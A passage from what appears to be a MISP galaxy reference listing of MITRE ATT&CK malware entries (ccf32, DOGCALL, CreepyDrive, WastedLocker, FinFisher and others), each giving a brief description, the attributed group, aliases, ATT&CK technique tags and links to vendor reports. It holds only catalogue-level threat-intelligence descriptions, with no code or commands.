https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046

ccf32 - S1043

[ccf32](https://attack.mitre.org/software/S1043) is data collection malware that has been used since at least February 2019, most notably during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign; there is also a similar x64 version.(Citation: Bitdefender FunnyDream Campaign November 2020)

The tag is: misp-galaxy:mitre-malware="ccf32 - S1043"

ccf32 - S1043 is also known as:

  • ccf32

Table 7425. Table References

Links

https://attack.mitre.org/software/S1043

https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf

DOGCALL - S0213

[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="DOGCALL - S0213"

DOGCALL - S0213 is also known as:

  • DOGCALL

DOGCALL - S0213 has relationships with:

  • similar: misp-galaxy:tool="DOGCALL" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 7426. Table References

Links

https://attack.mitre.org/software/S0213

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

PyDCrypt - S1032

[PyDCrypt](https://attack.mitre.org/software/S1032) is malware written in Python designed to deliver [DCSrv](https://attack.mitre.org/software/S1033). It has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021, with each sample tailored for its intended victim organization.(Citation: Checkpoint MosesStaff Nov 2021)

The tag is: misp-galaxy:mitre-malware="PyDCrypt - S1032"

PyDCrypt - S1032 is also known as:

  • PyDCrypt

Table 7427. Table References

Links

https://attack.mitre.org/software/S1032

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

CreepyDrive - S1023

[CreepyDrive](https://attack.mitre.org/software/S1023) is a custom implant that has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least early 2022 for C2 with, and exfiltration to, actor-controlled OneDrive accounts.(Citation: Microsoft POLONIUM June 2022)

[POLONIUM](https://attack.mitre.org/groups/G1005) has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.(Citation: Microsoft POLONIUM June 2022)

The tag is: misp-galaxy:mitre-malware="CreepyDrive - S1023"

CreepyDrive - S1023 is also known as:

  • CreepyDrive

Table 7428. Table References

Links

https://attack.mitre.org/software/S1023

https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

HummingWhale - S0321

[HummingWhale](https://attack.mitre.org/software/S0321) is an Android malware family that performs ad fraud. (Citation: ArsTechnica-HummingWhale)

The tag is: misp-galaxy:mitre-malware="HummingWhale - S0321"

HummingWhale - S0321 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"

Table 7429. Table References

Links

http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/

https://attack.mitre.org/software/S0321

WireLurker - S0312

[WireLurker](https://attack.mitre.org/software/S0312) is a family of macOS malware that targets iOS devices connected over USB. (Citation: PaloAlto-WireLurker)

The tag is: misp-galaxy:mitre-malware="WireLurker - S0312"

WireLurker - S0312 has relationships with:

  • similar: misp-galaxy:malpedia="WireLurker (OS X)" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

Table 7430. Table References

Links

https://attack.mitre.org/software/S0312

https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

RATANKBA - S0241

[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)

The tag is: misp-galaxy:mitre-malware="RATANKBA - S0241"

RATANKBA - S0241 is also known as:

  • RATANKBA

Table 7431. Table References

Links

https://attack.mitre.org/software/S0241

https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/

https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html

SUGARDUMP - S1042

[SUGARDUMP](https://attack.mitre.org/software/S1042) is a proprietary browser credential harvesting tool that was used by UNC3890 during the [C0010](https://attack.mitre.org/campaigns/C0010) campaign. The first known [SUGARDUMP](https://attack.mitre.org/software/S1042) version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.(Citation: Mandiant UNC3890 Aug 2022)

The tag is: misp-galaxy:mitre-malware="SUGARDUMP - S1042"

SUGARDUMP - S1042 is also known as:

  • SUGARDUMP

Table 7432. Table References

Links

https://attack.mitre.org/software/S1042

https://www.mandiant.com/resources/blog/suspected-iranian-actor-targeting-israeli-shipping

HAPPYWORK - S0214

[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="HAPPYWORK - S0214"

HAPPYWORK - S0214 has relationships with:

  • similar: misp-galaxy:tool="HAPPYWORK" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 7433. Table References

Links

https://attack.mitre.org/software/S0214

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

CreepySnail - S1024

[CreepySnail](https://attack.mitre.org/software/S1024) is a custom PowerShell implant that has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least 2022.(Citation: Microsoft POLONIUM June 2022)

The tag is: misp-galaxy:mitre-malware="CreepySnail - S1024"

CreepySnail - S1024 is also known as:

  • CreepySnail

Table 7434. Table References

Links

https://attack.mitre.org/software/S1024

https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/

StreamEx - S0142

[StreamEx](https://attack.mitre.org/software/S0142) is a malware family that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)

The tag is: misp-galaxy:mitre-malware="StreamEx - S0142"

StreamEx - S0142 is also known as:

  • StreamEx

StreamEx - S0142 has relationships with:

  • similar: misp-galaxy:tool="StreamEx" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 7435. Table References

Links

https://attack.mitre.org/software/S0142

https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar

GolfSpy - S0421

[GolfSpy](https://attack.mitre.org/software/S0421) is Android spyware deployed by the group [Bouncing Golf](https://attack.mitre.org/groups/G0097).(Citation: Trend Micro Bouncing Golf 2019)

The tag is: misp-galaxy:mitre-malware="GolfSpy - S0421"

GolfSpy - S0421 is also known as:

  • GolfSpy

Table 7436. Table References

Links

https://attack.mitre.org/software/S0421

https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/

Pisloader - S0124

[Pisloader](https://attack.mitre.org/software/S0124) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://attack.mitre.org/groups/G0026) and is similar to another malware family, [HTTPBrowser](https://attack.mitre.org/software/S0070), that has been used by the group. (Citation: Palo Alto DNS Requests)

The tag is: misp-galaxy:mitre-malware="Pisloader - S0124"

Pisloader - S0124 is also known as:

  • Pisloader

Pisloader - S0124 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7437. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/

https://attack.mitre.org/software/S0124

ZxShell - S0412

[ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014)

The tag is: misp-galaxy:mitre-malware="ZxShell - S0412"

ZxShell - S0412 is also known as:

  • ZxShell

  • Sensocode

Table 7438. Table References

Links

https://attack.mitre.org/software/S0412

https://blogs.cisco.com/security/talos/opening-zxshell

https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf

KARAE - S0215

[KARAE](https://attack.mitre.org/software/S0215) is a backdoor typically used by [APT37](https://attack.mitre.org/groups/G0067) as first-stage malware. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="KARAE - S0215"

KARAE - S0215 is also known as:

  • KARAE

KARAE - S0215 has relationships with:

  • similar: misp-galaxy:tool="KARAE" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7439. Table References

Links

https://attack.mitre.org/software/S0215

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

DEADEYE - S1052

[DEADEYE](https://attack.mitre.org/software/S1052) is a malware launcher that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least May 2021. [DEADEYE](https://attack.mitre.org/software/S1052) has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).(Citation: Mandiant APT41)

The tag is: misp-galaxy:mitre-malware="DEADEYE - S1052"

DEADEYE - S1052 is also known as:

  • DEADEYE

  • DEADEYE.EMBED

  • DEADEYE.APPEND

Table 7440. Table References

Links

https://attack.mitre.org/software/S1052

https://www.mandiant.com/resources/apt41-us-state-governments

Amadey - S1025

[Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)

The tag is: misp-galaxy:mitre-malware="Amadey - S1025"

Amadey - S1025 is also known as:

  • Amadey

Table 7441. Table References

Links

https://attack.mitre.org/software/S1025

https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot

https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=

FatDuke - S0512

[FatDuke](https://attack.mitre.org/software/S0512) is a backdoor used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2016.(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="FatDuke - S0512"

FatDuke - S0512 is also known as:

  • FatDuke

Table 7442. Table References

Links

https://attack.mitre.org/software/S0512

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

EvilGrab - S0152

[EvilGrab](https://attack.mitre.org/software/S0152) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://attack.mitre.org/groups/G0045) via malicious Microsoft Office documents as part of spearphishing campaigns. (Citation: PWC Cloud Hopper Technical Annex April 2017)

The tag is: misp-galaxy:mitre-malware="EvilGrab - S0152"

EvilGrab - S0152 is also known as:

  • EvilGrab

EvilGrab - S0152 has relationships with:

  • similar: misp-galaxy:malpedia="EvilGrab" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="EvilGrab" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 7443. Table References

Links

https://attack.mitre.org/software/S0152

https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf

Remsec - S0125

[Remsec](https://attack.mitre.org/software/S0125) is a modular backdoor that has been used by [Strider](https://attack.mitre.org/groups/G0041) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)

The tag is: misp-galaxy:mitre-malware="Remsec - S0125"

Remsec - S0125 is also known as:

  • Remsec

  • Backdoor.Remsec

  • ProjectSauron

Remsec - S0125 has relationships with:

  • similar: misp-galaxy:malpedia="Remsec" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 7444. Table References

Links

http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets

https://attack.mitre.org/software/S0125

https://securelist.com/faq-the-projectsauron-apt/75533/

Zebrocy - S0251

[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020)

The tag is: misp-galaxy:mitre-malware="Zebrocy - S0251"

Zebrocy - S0251 is also known as:

  • Zebrocy

  • Zekapab

Table 7445. Table References

Links

https://attack.mitre.org/software/S0251

https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/

https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

https://www.accenture.com/t20181129T203820Zw/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50

https://www.cyberscoop.com/apt28-brexit-phishing-accenture/

ComRAT - S0126

[ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)

The tag is: misp-galaxy:mitre-malware="ComRAT - S0126"

ComRAT - S0126 is also known as:

  • ComRAT

ComRAT - S0126 has relationships with:

  • similar: misp-galaxy:rat="ComRAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Agent.BTZ" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Agent.BTZ" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7446. Table References

Links

https://attack.mitre.org/software/S0126

https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html

https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1

https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf

POORAIM - S0216

[POORAIM](https://attack.mitre.org/software/S0216) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) in campaigns since at least 2014. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="POORAIM - S0216"

POORAIM - S0216 is also known as:

  • POORAIM

POORAIM - S0216 has relationships with:

  • similar: misp-galaxy:tool="POORAIM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7447. Table References

Links

https://attack.mitre.org/software/S0216

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

Catchamas - S0261

[Catchamas](https://attack.mitre.org/software/S0261) is a Windows Trojan that steals information from compromised systems. (Citation: Symantec Catchamas April 2018)

The tag is: misp-galaxy:mitre-malware="Catchamas - S0261"

Catchamas - S0261 is also known as:

  • Catchamas

Table 7448. Table References

Links

https://attack.mitre.org/software/S0261

https://www-west.symantec.com/content/symantec/english/en/security-center/writeup.html/2018-040209-1742-99

Komplex - S0162

[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).

The tag is: misp-galaxy:mitre-malware="Komplex - S0162"

Komplex - S0162 is also known as:

  • Komplex

Komplex - S0162 has relationships with:

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="GAMEFISH" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Komplex" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7449. Table References

Links

https://attack.mitre.org/software/S0162

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/

WastedLocker - S0612

[WastedLocker](https://attack.mitre.org/software/S0612) is a ransomware family attributed to [Indrik Spider](https://attack.mitre.org/groups/G0119) that has been used since at least May 2020. [WastedLocker](https://attack.mitre.org/software/S0612) has been used against a broad variety of sectors, including manufacturing, information technology, and media.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020)

The tag is: misp-galaxy:mitre-malware="WastedLocker - S0612"

WastedLocker - S0612 is also known as:

  • WastedLocker

Table 7450. Table References

Links

https://attack.mitre.org/software/S0612

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us

https://www.sentinelone.com/labs/wastedlocker-ransomware-abusing-ads-and-ntfs-file-attributes/

Mongall - S1026

[Mongall](https://attack.mitre.org/software/S1026) is a backdoor that has been used since at least 2013, including by [Aoqin Dragon](https://attack.mitre.org/groups/G1007).(Citation: SentinelOne Aoqin Dragon June 2022)

The tag is: misp-galaxy:mitre-malware="Mongall - S1026"

Mongall - S1026 is also known as:

  • Mongall

Table 7451. Table References

Links

https://attack.mitre.org/software/S1026

https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

BBSRAT - S0127

[BBSRAT](https://attack.mitre.org/software/S0127) is malware with remote access tool functionality that has been used in targeted compromises. (Citation: Palo Alto Networks BBSRAT)

The tag is: misp-galaxy:mitre-malware="BBSRAT - S0127"

BBSRAT - S0127 is also known as:

  • BBSRAT

BBSRAT - S0127 has relationships with:

  • similar: misp-galaxy:malpedia="BBSRAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 7452. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/

https://attack.mitre.org/software/S0127

KEYMARBLE - S0271

[KEYMARBLE](https://attack.mitre.org/software/S0271) is a Trojan that has reportedly been used by the North Korean government. (Citation: US-CERT KEYMARBLE Aug 2018)

The tag is: misp-galaxy:mitre-malware="KEYMARBLE - S0271"

KEYMARBLE - S0271 is also known as:

  • KEYMARBLE

Table 7453. Table References

Links

https://attack.mitre.org/software/S0271

https://www.us-cert.gov/ncas/analysis-reports/AR18-221A

SHUTTERSPEED - S0217

[SHUTTERSPEED](https://attack.mitre.org/software/S0217) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="SHUTTERSPEED - S0217"

SHUTTERSPEED - S0217 has relationships with:

  • similar: misp-galaxy:tool="SHUTTERSPEED" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 7454. Table References

Links

https://attack.mitre.org/software/S0217

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

Reaver - S0172

[Reaver](https://attack.mitre.org/software/S0172) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel](https://attack.mitre.org/techniques/T1218/002) items.(Citation: Palo Alto Reaver Nov 2017)

The tag is: misp-galaxy:mitre-malware="Reaver - S0172"

Reaver - S0172 is also known as:

  • Reaver

Reaver - S0172 has relationships with:

  • similar: misp-galaxy:malpedia="Reaver" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060" with estimative-language:likelihood-probability="almost-certain"

Table 7455. Table References

Links

https://attack.mitre.org/software/S0172

https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

BADNEWS - S0128

[BADNEWS](https://attack.mitre.org/software/S0128) is malware that has been used by the actors responsible for the [Patchwork](https://attack.mitre.org/groups/G0040) campaign. Its name was given due to its use of RSS feeds, forums, and blogs for command and control. (Citation: Forcepoint Monsoon) (Citation: TrendMicro Patchwork Dec 2017)

The tag is: misp-galaxy:mitre-malware="BADNEWS - S0128"

BADNEWS - S0128 is also known as:

  • BADNEWS

BADNEWS - S0128 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7456. Table References

Links

https://attack.mitre.org/software/S0128

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

SLOWDRIFT - S0218

[SLOWDRIFT](https://attack.mitre.org/software/S0218) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) against academic and strategic victims in South Korea. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="SLOWDRIFT - S0218"

SLOWDRIFT - S0218 is also known as:

  • SLOWDRIFT

SLOWDRIFT - S0218 has relationships with:

  • similar: misp-galaxy:tool="SLOWDRIFT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7457. Table References

Links

https://attack.mitre.org/software/S0218

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

Dok - S0281

[Dok](https://attack.mitre.org/software/S0281) is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user’s network traffic (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)).(Citation: objsee mac malware 2017)(Citation: hexed osx.dok analysis 2019)(Citation: CheckPoint Dok)

The tag is: misp-galaxy:mitre-malware="Dok - S0281"

Dok - S0281 is also known as:

  • Dok

  • Retefe

Table 7458. Table References

Links

http://www.hexed.in/2019/07/osxdok-analysis.html

https://attack.mitre.org/software/S0281

https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

https://objective-see.com/blog/blog_0x25.html

FinFisher - S0182

[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)

The tag is: misp-galaxy:mitre-malware="FinFisher - S0182"

FinFisher - S0182 is also known as:

  • FinFisher

  • FinSpy

FinFisher - S0182 has relationships with:

  • similar: misp-galaxy:malpedia="FinFisher RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038" with estimative-language:likelihood-probability="almost-certain"

Table 7459. Table References

Links

http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf

http://www.finfisher.com/FinFisher/index.html

https://attack.mitre.org/software/S0182

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/

https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html

Sunbird - S1082

[Sunbird](https://attack.mitre.org/software/S1082) is one of two mobile malware families known to be used by the APT [Confucius](https://attack.mitre.org/groups/G0142). Analysis suggests that [Sunbird](https://attack.mitre.org/software/S1082) was first active in early 2017. While [Sunbird](https://attack.mitre.org/software/S1082) and [Hornbill](https://attack.mitre.org/software/S1077) overlap in core capabilities, [Sunbird](https://attack.mitre.org/software/S1082) has a more extensive set of malicious features.(Citation: lookout_hornbill_sunbird_0221)

The tag is: misp-galaxy:mitre-malware="Sunbird - S1082"

Sunbird - S1082 is also known as:

  • Sunbird

Table 7460. Table References

Links

https://attack.mitre.org/software/S1082

https://www.lookout.com/blog/lookout-discovers-novel-confucius-apt-android-spyware-linked-to-india-pakistan-conflict

WINERACK - S0219

[WINERACK](https://attack.mitre.org/software/S0219) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="WINERACK - S0219"

WINERACK - S0219 has relationships with:

  • similar: misp-galaxy:tool="WINERACK" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"

Table 7461. Table References

Links

https://attack.mitre.org/software/S0219

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

PJApps - S0291

[PJApps](https://attack.mitre.org/software/S0291) is an Android malware family. (Citation: Lookout-EnterpriseApps)

The tag is: misp-galaxy:mitre-malware="PJApps - S0291"

PJApps - S0291 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448" with estimative-language:likelihood-probability="almost-certain"

Table 7462. Table References

Links

https://attack.mitre.org/software/S0291

https://blog.lookout.com/blog/2016/05/25/spoofed-apps/

Escobar - S1092

[Escobar](https://attack.mitre.org/software/S1092) is an Android banking trojan, first detected in March 2021, believed to be a new variant of AbereBot.(Citation: Bleeping Computer Escobar)

The tag is: misp-galaxy:mitre-malware="Escobar - S1092"

Escobar - S1092 is also known as:

  • Escobar

Table 7463. Table References

Links

https://attack.mitre.org/software/S1092

https://www.bleepingcomputer.com/news/security/android-malware-escobar-steals-your-google-authenticator-mfa-codes/

DCSrv - S1033

[DCSrv](https://attack.mitre.org/software/S1033) is destructive malware that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021. Though [DCSrv](https://attack.mitre.org/software/S1033) has ransomware-like capabilities, [Moses Staff](https://attack.mitre.org/groups/G1009) does not demand ransom or offer a decryption key.(Citation: Checkpoint MosesStaff Nov 2021)

The tag is: misp-galaxy:mitre-malware="DCSrv - S1033"

DCSrv - S1033 is also known as:

  • DCSrv

Table 7464. Table References

Links

https://attack.mitre.org/software/S1033

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

RuMMS - S0313

[RuMMS](https://attack.mitre.org/software/S0313) is an Android malware family. (Citation: FireEye-RuMMS)

The tag is: misp-galaxy:mitre-malware="RuMMS - S0313"

RuMMS - S0313 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"

Table 7465. Table References

Links

https://attack.mitre.org/software/S0313

https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html

HotCroissant - S0431

[HotCroissant](https://attack.mitre.org/software/S0431) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.(Citation: US-CERT HOTCROISSANT February 2020) [HotCroissant](https://attack.mitre.org/software/S0431) shares numerous code similarities with [Rifdoor](https://attack.mitre.org/software/S0433).(Citation: Carbon Black HotCroissant April 2020)

The tag is: misp-galaxy:mitre-malware="HotCroissant - S0431"

HotCroissant - S0431 is also known as:

  • HotCroissant

Table 7466. Table References

Links

https://attack.mitre.org/software/S0431

https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/

https://www.us-cert.gov/ncas/analysis-reports/ar20-045d

Downdelph - S0134

